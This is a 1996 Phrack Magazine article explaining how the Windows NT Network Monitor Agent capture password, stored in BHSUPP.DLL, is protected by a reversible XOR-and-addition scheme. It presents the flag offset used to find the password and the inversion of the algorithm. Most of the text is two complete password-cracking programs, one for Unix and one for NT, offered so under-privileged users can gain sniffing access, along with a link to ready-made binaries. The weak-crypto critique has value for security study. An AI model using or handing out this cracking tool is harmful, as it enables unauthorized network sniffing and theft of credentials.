| ==Phrack Magazine== |
|
|
| Volume Seven, Issue Forty-Eight, File 15 of 18 |
|
|
|
|
| Windows NT Network Monitor Exploitation |
|
|
| NetMon Encryption Hammer |
| |
| by the AON and Route |
| for Phrack Magazine |
| May 1996 Guild productions, kid |
|
|
| comments to daemon9@netcom.com |
|
|
| Full exploit including binary dll's and execuatables: |
| ftp.infonexus.com/pub/TooldOfTheTrade/Windows/NT/netMonExploit.tgz |
|
|
|
|
| [The intro] |
|
|
| The Microsoft Network Monitor is a packet sniffer that runs under NT. |
| It is a very robust and versatile packet sniffer, offering much more then |
| simple ethernet frame capturing. It packs a robust capture/display filter |
| language, powerful protocol parsers, and one snappy GUI. NetMon is |
| delivered as part of the SMS package. The user portion of the program |
| calls upon the services of the Network Monitor Agent, which is a kernel driver |
| that ships with NT (3.5.x for sure, but I don't know about 3.1). The Network |
| Monitor Agent also provides an interface for a remote machine to connect and |
| capture local data, provided it passes authentication. To restrict access, |
| Network Monitor Agent utilizes a password authentication scheme. Access has |
| two tiers: priviledge to view previously captured sessions, and priviledge to |
| actually use the sniffer to place the ethernet card in promiscuous mode. The |
| acutal encrypted password is stored as a 32-byte binary string in a |
| dynamically linked library file called BHSUPP.DLL. We have written code to |
| extract this password from the dll and decyrpt it; we have broken the |
| Microsoft Network Monitor password authentication system. |
|
|
|
|
| [The low-down] |
|
|
| The encrypted string is kept as binary data in: |
| %SystemRoot%\system32\BHSUPP.DLL (in a default installation at least). |
| BHSUPP.DLL is known to be different sizes between versions, so we cannot look |
| for the encrypted string at a specific offset each time. Instead we must |
| search for a flag, and seek 32-bytes past this flag. The flag is the 16-byte |
| string: "RTSS&G--BEGIN--". (As a matter of note, there is a terminating |
| footer also: "RTSS&G--END--".) |
|
|
|
|
| [The encrypted truth] |
|
|
| It is a simple encryption function, that takes random length string |
| and returns 256-bit encrypted output. It may appear to be a hash, rather |
| than a block cipher, but it is not. It does take a random length input, |
| and produce a fixed output, but the input is always padded to 32-bytes |
| (with nulls if necessary). The input to the function is a user defined |
| arbitrary string. The input is truncated to 16 bytes and then to pad |
| out the array, the whole original password string is concatenated on the |
| truncated version, starting at the 16th byte. It doesn't matter if the |
| resulting string is longer than 32 bytes, as the cipher ignores anything |
| past the 32nd byte. So: "loveKillsTheDemon" becomes: "loveKillsTheDemo" |
| and then: "loveKillsTheDemoloveKillsTheDemon". If your password is |
| smaller than 16 bytes, we get the 'hole-in-password' phenomena. Since |
| the array is intialized will nulls, and the password is still folded over to |
| the 16th byte, these nulls remain. This is easily visible from the first line |
| of output in our exploit code. It also accepts empty password strings |
| readily, without choking, which all Microsoft products seem willing to do all |
| to easily. |
|
|
| [The algorithm] |
|
|
| The 32-byte string is put through 32 rounds of identical operations. |
| The outer for loop controls the value of the byte to be XORed with the |
| entire array that round (except for itself, see below). The inner loop steps |
| through the entire byte array. Each byte is permuted a total of 31 times |
| (The discrepency comes from the test case where i must not be equal to j in |
| order for a character to be permuted. It would make no sense to XOR a byte |
| with itself). So, there are a total of 992 operations. The actual |
| encryption algorithm is quite simple: |
|
|
| In C: if(i!=j)mix[j]^=mix[i]+(i^j)+j; |
|
|
| In English: if i is NOT equal to j, the j indexed char of mix is |
| assigned the value of the j indexed char of mix XORed |
| with the i indexed char of mix PLUS i XORed with j |
| PLUS j. |
|
|
| Mathematically: 1) i ^ j = k |
| 2) k + j = l |
| 3) l + mix[i] = m |
| 4) m ^ mix[j] = x |
|
|
| OR |
|
|
| ((i ^ j) + j + mix[i]) ^ mix[j] = x |
|
|
|
|
| The methods used for obscurity are exclusive OR (XOR) and binary |
| addition, (see the appendix if you are umfamiliar with these bitwise |
| operations) with completely known vectors. The only unknown in the whole |
| equation is the user entered password, fleshed out to 32-bytes. These 32 |
| bytes are taken through 32 rounds of permutations. Simple and concise, |
| with no key material dropped, this algorithm is not lossy. Since it is not |
| lossy it is 100% reversible, both in theory and practice. In fact, since we |
| know the values of the counters i and j, throughout the entire encryption |
| process, decryption is simply a matter of reproducing these values in the |
| proper order. Since the output of the encryption process is the input, |
| taken through 32 rounds of identical permutations, with known vectors, |
| we simply need to reverse this process. |
|
|
| [The code] |
|
|
| There are two versions of the exploit available. A Windows NT version |
| and, for those of you without access to an expensive NT-native compiler, |
| there is a Unix version as well. The NT version is a console-based app, as |
| GUI code would be a waste of time. The full package of this exploit, along |
| with an NT exexcutable and sample DLL's is available from: |
| ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz |
|
|
|
|
| [The discussion] |
|
|
| The ramifications of this weak encryption in Network Monitor Agent are |
| many. First off, the developers of Network Monitor Agent *didn't* use the |
| standard security mechanisms of Windows NT. This may be because the driver is |
| a kernel mode driver, and in NT the kernel is a trusted enity, therefore |
| the standard security API (of Win32) does not apply in the kernel making it |
| harder to do user authentication. It also appears that they were trying to |
| achieve a mechanism based not on priviledge, but on knowledge. It is very |
| likely that in secured environment not all administrators should be able to |
| sniff the network. The problem is they did a *poor* job of securing a |
| powerful utility. |
| The most straight forward attack is use Network Monitor to sniff the |
| network (where you weren't suppose to be able to) for priviledged user data or |
| passwords in a heterogeneous environment (since native NT networking does not |
| send password information in the clear, but standard TCP traffic from Unix |
| is sent clear). The rest of the attacks would come from shabby administration |
| , such as the administrator used the password for the admin account and the |
| capture password in Network Monitor Agent (stupid, but likely) or the |
| same password for Network Monitor Agent on all machines across the network. |
| In order to use the exploit utility, one must have read priviledge for |
| BHSUPP.DLL which is installed into %SystemRoot%\system32 by default. This |
| is not a remote attack, but rather a stepping stone to gain priviledged |
| information when one is under-priviledged. |
|
|
| [The moral] |
|
|
| Time and time again we see either shody implementations of trusted |
| algorithms, or, like in this case, just plain bad cryptography. Under ITAR, |
| most secure cryptographic algorithms are classified as munitions, and are not |
| exportable from this country. The funny thing is, under current law, one-way |
| hashing functions are *not* restricted (that is why all Unix variants can ship |
| with the standard crypt(3) libraries and executables). This authentication |
| scheme could have *easily* been replaced by MD5, the same one-way hash used |
| by PGP. At least then, the complexity of an attack would be increased to |
| a brute-force known-plaintext sweep of key values... |
|
|
|
|
|
|
| [The appendix] |
|
|
| For the binary-declined... |
|
|
| Exclusive OR |
|
|
| The XOR operation is a bitwise operation with the following truth table: |
|
|
| XOR| 1 | 0 | The Exclusive OR operation simply says: |
| ------------- "...Hmmm, if I have a 1 and a 0, I'll spit |
| 1 | 0 | 1 | out a 1. Anything else, a 0..." |
| ------------- |
| 0 | 1 | 0 | |
|
|
|
|
| Binary addition |
|
|
| Binary addition is analogous to base10 addition. However, each place holds |
| 2^n instead of 10^n... |
|
|
| add| 1 | 0 | base10: base2: |
| ------------- 11 1011 |
| 1 |1 0| 1 | + 5 + 0101 |
| ------------- --- ------ |
| 0 | 1 | 0 | 16 10000 |
|
|
|
|
|
|
|
|
| This exploit made possbile by a grant from the Guild corporation. |
|
|
| - May 07, 1996 route/aon |
|
|
|
|
| [The Sourcecode] |
| [Unix Version] |
|
|
| /* |
|
|
| Network Monitor Exploitation code, Unix version |
| coded by daemon9 |
| The Guild, 1996 |
|
|
| */ |
|
|
|
|
| #include<string.h> |
| #include<stdio.h> |
| #include<fcntl.h> |
|
|
| #define fbufsize 8192 |
| #define flag "RTSS&G--BEGIN--" |
| #define VERSION "Unix version\n" |
| #define BUFSIZE 48 |
| #define DLLNAME "./BHSUPP.DLL" |
|
|
| int main() |
| { |
| char *swirl(char *,int); |
| char *recover(char *); |
| void hexonx(char *); |
|
|
| char werd[]={"\n\n\n\n.this code made possible by a grant from the Guild corporation.\n\0"}; |
| char *plain,*tmp,*fname,*encrypted; |
| int c; |
|
|
| printf(werd); |
| printf("\nNetMon Password Decryption Engine "); |
| printf(VERSION); |
| printf("\t1.\t\tEncrypt a plaintext password from STDIN.\n"); |
| printf("\t2.\t\tDecrypt a plaintext password from the dll.\n"); |
| tmp=(char *)malloc(10); /* Can't switch getchar() as it locks the */ |
| bzero(tmp,10); /* fucking stream and makes futher I/O buggy*/ |
| switch(atoi(gets(tmp))){ |
| case 1: |
| printf("Enter password to be encrypted (note echo is on, as it would be a moot point\nto turn it off)\n->"); |
| plain=(char *)malloc(BUFSIZE); |
| bzero(plain,sizeof(BUFSIZE)); |
| gets(plain); |
| hexonx(swirl(plain,0)); |
| break; |
| case 2: |
| printf("Enter name and path of DLL [./BHSUPP.DLL]:"); |
| fname=(char *)malloc(BUFSIZE); |
| bzero(fname,sizeof(BUFSIZE)); |
| gets(fname); |
| if(fname[0]==0)strcpy(fname,DLLNAME); |
| if(!(encrypted=recover(fname))){ |
| printf("Could not locate flag\n"); |
| exit(1); |
| } |
| hexonx(swirl(encrypted,1)); |
| break; |
| default: |
| printf("\nFine.\n"); |
| exit(0); |
| } |
| return 0; |
| } |
|
|
| /* |
| swirl is the encryption/decryption function. It takes an arbitrary length |
| string and, depending on the value of the mode variable, encrypts it or |
| decrypts it. It returns a pointer to the string. |
| */ |
|
|
| char *swirl(byteStr,mode) |
| char *byteStr; |
| int mode; |
| { |
| int i=0,j=0; |
| char *mix,roundAndround[32][32]; |
| void hexonx(char *); |
|
|
| mix=(char *)malloc(sizeof(byteStr)); |
|
|
|
|
| if(!mode){ |
| memset(mix,0,32); /* set 32 bytes of memory to 0 */ |
| strncpy(mix,byteStr,16); /* copy the first 16 bytes of the password into the mix*/ |
| memcpy(&mix[16],byteStr,strlen(byteStr)); /* copy password into the 16th char of the mix; if mix and plain overlap, problems occur */ |
|
|
| printf("Password upon entering encryption rounds:\n"); |
| hexonx(mix); |
| printf("\n\nbeginning 32 rounds of 'encryption'\n"); |
| for(i=0;i<32;i++)for(j=0;j<32;j++)if(i!=j){ |
| mix[j]^=mix[i]+(i^j)+j; /* Sekret Enkripsion occurs here... */ |
| memcpy(&roundAndround[i][0],mix,32); /* save a copy of each round */ |
| } |
| printf("\nDo you wish to view the encryption process round by round?[y]"); |
| switch(toupper(getchar())){ |
| case 'N': |
| break; |
| case 'Y': |
| default: |
| for(i=0;i<32;i++){ |
| printf("round %d:\n",i+1); /* print the rounds out in hex */ |
| hexonx(&roundAndround[i][0]); |
| getc(stdin); |
| } |
| } |
| printf("\nEncrypted output:\n"); |
| return(mix); |
| } |
| if(mode){ |
| strncpy(mix,byteStr,32); |
| for(i=31;i>=0;i--)for(j=31;j>=0;j--)if(i!=j)mix[j]^=mix[i]+(i^j)+j; |
| mix[32]=0; |
| printf("\n\n\nThe plaintext is: %s\nIn hex:\n",mix); |
| return(mix); |
| } |
| } |
|
|
| /* |
| hexonx simply prints out 32 bytes of hexidecimal characters. |
| */ |
|
|
| void hexonx(byteStr) |
| char *byteStr; |
| { |
| int i=0; |
| for(;i<32;i++)printf("0x%x ",byteStr[i]); |
| printf("\n"); |
| } |
|
|
|
|
| /* |
| recover attempts to read the encrypted string from the dll |
| */ |
|
|
| char *recover(fname) |
| char *fname; |
| { |
|
|
| char buffer[fbufsize],*pass; |
| int fd,i=0,j=0,demonFlag=0,offset,bufOffset=0; |
|
|
| if((fd=open(fname,O_RDONLY))<=0){ |
| fprintf(stderr,"Cannot open %s\n",fname); |
| exit(1); |
| } |
| while(read(fd,buffer,8192)){ |
| i=0; |
| while(i<fbufsize&&!demonFlag){ |
| switch(buffer[i-4]){ |
| case 'R': |
| if(buffer[i-3]=='T'&&buffer[i-2]=='S'&&buffer[i-1]=='S'&&buffer[i+1]=='G'&&buffer[i+2]=='-'&&buffer[i+3]=='-'&&buffer[i+4]=='B'&&buffer[i+5]=='E'&&buffer[i+6]=='G'&&buffer[i+7]=='I'&&buffer[i+8]=='N'&&buffer[i+9]=='-'&&buffer[i+10]=='-'){ |
| demonFlag++; |
| bufOffset=i; |
| /* Password is 32 bytes past end of header */ offset=j-4; |
| printf("Encrypted Token Flag: '%s' located at offset 0x%x\n",flag,offset); |
| printf("Encrypted password should be located at offset 0x%x\n",offset+48); |
| } |
| break; |
| default: |
| } |
| i++; |
| j++; |
| } |
| if(demonFlag)break; |
| } |
| if(!offset)return(0); |
| pass=(char *)malloc(BUFSIZE); |
| bzero(pass,32); |
| memcpy(pass,&buffer[bufOffset-4+48],32); |
| |
| printf("\nDo you wish to view the encrypted password?[y]"); |
| switch(toupper(getchar())){ |
| case 'N': |
| break; |
| case 'Y': |
| default: |
| hexonx(pass); |
| getc(stdin); |
| } |
| return(pass); |
| } |
|
|
|
|
| [The Sourcecode] |
| [NT Version] |
|
|
|
|
|
|
| // A Guild Production 1996 // |
| // Constructed by AON // |
|
|
| #define STRICT |
| #define MAX_FILE_SIZE 24576 //if BHSUPP.DLL grows, so must this |
| |
| #include <windows.h> |
| #include <stdio.h> |
|
|
| void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword); |
| BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword); |
| void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile); |
|
|
| HANDLE g_hStdIn, g_hStdOut; //global declaration of StandardIN and OUT |
|
|
|
|
| // This is a console app. ReadFile and WriteFile used throughout so StdIN and StdOUT |
| // can be redirected. |
|
|
| void main(int argc, char* argv[]) |
| { |
| HANDLE hTargetFile; |
| BYTE lpEncryptedPassword[32]; |
| char lpszPlaintextPassword[17] = {0}; |
| char lpszOutputBuffer[80]; |
| char lpszTargetFile[MAX_PATH] = {0}; |
| char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename]\n"; |
| LPTSTR lpszSystemDirectory = NULL; |
| UINT nCount, nCount2; |
| |
| //set global handles |
| |
| g_hStdIn = GetStdHandle(STD_INPUT_HANDLE); |
| g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); |
|
|
| //check for standard NT help switch |
| |
| if(argc > 1 && argv[1][0] == '/' && argv[1][1] == '?') |
| { |
| //display usage info |
| |
| WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL); |
| |
| //exit with success |
| |
| ExitProcess(0L); |
| } |
| |
| //if path and file name not specified on commandline try system directory first, because |
| //BHSUPP.DLL is probably there |
| if(argc == 1) |
| { |
| //findout how long path is for mem alloc |
| nCount = GetSystemDirectory(lpszSystemDirectory, 0); |
| |
| //do alloc of that size |
| lpszSystemDirectory = malloc(nCount); |
| |
| if(lpszSystemDirectory == NULL) |
| { |
| WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", |
| 41, &nCount, NULL); |
|
|
| ExitProcess(1L); |
| } |
|
|
| //get system dir |
| GetSystemDirectory(lpszSystemDirectory, nCount); |
| |
| //append file name to system directory |
| sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory); |
| |
| //release memory |
| free(lpszSystemDirectory); |
| } |
| |
| else |
| { |
| //get the commandline input |
| strcpy(lpszTargetFile, argv[1]); |
| } |
|
|
| //try to open BHSUPP.DLL in the system dir or where the user instructed |
| hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | |
| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, |
| FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
|
|
| //if not on the commandline or in the system dir ask user for path |
| if(hTargetFile == INVALID_HANDLE_VALUE && argc == 1) |
| { |
| GetTargetFileFromUser(&hTargetFile, lpszTargetFile); |
| } |
| |
| //user gave bad path or they don't have read permission on the file |
| else if(hTargetFile == INVALID_HANDLE_VALUE) |
| { |
| //make error string because file open failed |
| nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile); |
|
|
| //write out |
| WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); |
| |
| //exit with failure |
| ExitProcess(1L); |
| } |
|
|
| //retrieve the encrypted password from BHSUPP.DLL |
| if(!GetEncryptedPassword(hTargetFile, lpEncryptedPassword)) |
| { |
| WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n", |
| 39, &nCount, NULL); |
|
|
| ExitProcess(1L); |
| } |
|
|
| //cleanup handle |
| CloseHandle(hTargetFile); |
|
|
| //do the decryption here |
| DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword); |
|
|
| //prepare for and print out results |
| nCount2 = sprintf(lpszOutputBuffer, |
| "\nThe Network Monitor Agent capture password is %s\n", |
| lpszPlaintextPassword); |
|
|
| WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); |
|
|
| //close StandardIN and StandardOUT handles |
| CloseHandle(g_hStdIn); |
|
|
| CloseHandle(g_hStdOut); |
|
|
| //exit with success |
| ExitProcess(0L); |
| } |
|
|
|
|
| //Ah yeah, here it is. |
| void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword) |
| { |
| register int outer, inner; |
|
|
| //go backwards through loops to undo XOR |
| for ( outer = 31; outer >= 0; outer-- ) |
| { |
| for ( inner = 31; inner >= 0; inner-- ) |
| { |
| if ( outer != inner ) |
| { |
| lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] + |
| (outer ^ inner) + inner; |
| } |
| } |
| } |
|
|
| //since the original password was folded to fill 32 bytes only copy the first 16 bytes |
| memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16); |
|
|
| //zero terminate this baby just incase it is actually a 16 byte password (yeah, right!) |
| lpszPlaintextPassword[16] = 0L; |
|
|
| return; |
| } |
|
|
|
|
| // get the path and file name for BHSUPP.DLL from the user in the case that it was |
| // a custom install |
| void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile) |
| { |
| char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: "; |
| UINT nCount; |
|
|
| WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL); |
|
|
| ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH, &nCount, NULL); |
|
|
| //I had to account for the CR + LF that ReadFile counts in the nCount return value, |
| //so I can zero terminate this string. |
| lpszTargetFile[nCount - 2] = 0L; |
| |
| *phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | |
| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, |
| FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
|
|
| //too lazy to make the error message report the actual path and file name tried |
| if(*phTargetFile == INVALID_HANDLE_VALUE) |
| { |
| WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n", |
| 26, &nCount, NULL); |
|
|
| ExitProcess(1L); |
| } |
| } |
|
|
|
|
| // This function allocs one big buffer and reads the whole damn DLL into it. |
| // There is a flag string that marks the start of the section that contains the |
| // encrypted passwords (in the case that there is a display password too), so |
| // we search for the first and last characters in the string. If we hit on a match |
| // we check about 50% of the chars in the string for a match. This is a good |
| // enough check based looking at the data. I guess I could optimize memory usage |
| // here too, but 24K is not very much these days, so fuck it. |
| BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword) |
| { |
| LPBYTE lpSearchBuffer; |
| UINT nCount, i; |
|
|
| //do the big buffer alloc |
| lpSearchBuffer = malloc(MAX_FILE_SIZE); |
|
|
| if(lpSearchBuffer == NULL) |
| { |
| WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", |
| 41, &nCount, NULL); |
|
|
| ExitProcess(1L); |
| } |
|
|
| //read in the entire file. It is small enough that this takes trivial time to complete. |
| ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL); |
| |
| //do search for RTSS&G--BEGIN-- When it is found move 48 bytes past the R and copy |
| //the encrypted password into the workspace |
| for(i=0; i<nCount; i++) |
| { |
| if(lpSearchBuffer[i] == 'R' && lpSearchBuffer[i+14] == '-') |
| { |
| if(lpSearchBuffer[i+1] == 'T' && lpSearchBuffer[i+2] == 'S' && |
| lpSearchBuffer[i+3] == 'S' && lpSearchBuffer[i+4] == '&' && |
| lpSearchBuffer[i+8] == 'B') |
| { |
| //found password and coping it into the workspace |
| memcpy(lpEncryptedPassword, &lpSearchBuffer[i+48], 32); |
| |
| //cleanup the mem alloc |
| free(lpSearchBuffer); |
|
|
| //return with success |
| return TRUE; |
| } |
| } |
| } |
|
|
| //cleanup |
| free(lpSearchBuffer); |
| |
| //it failed to find the marker string |
| return FALSE; |
| } |
|
|
|
|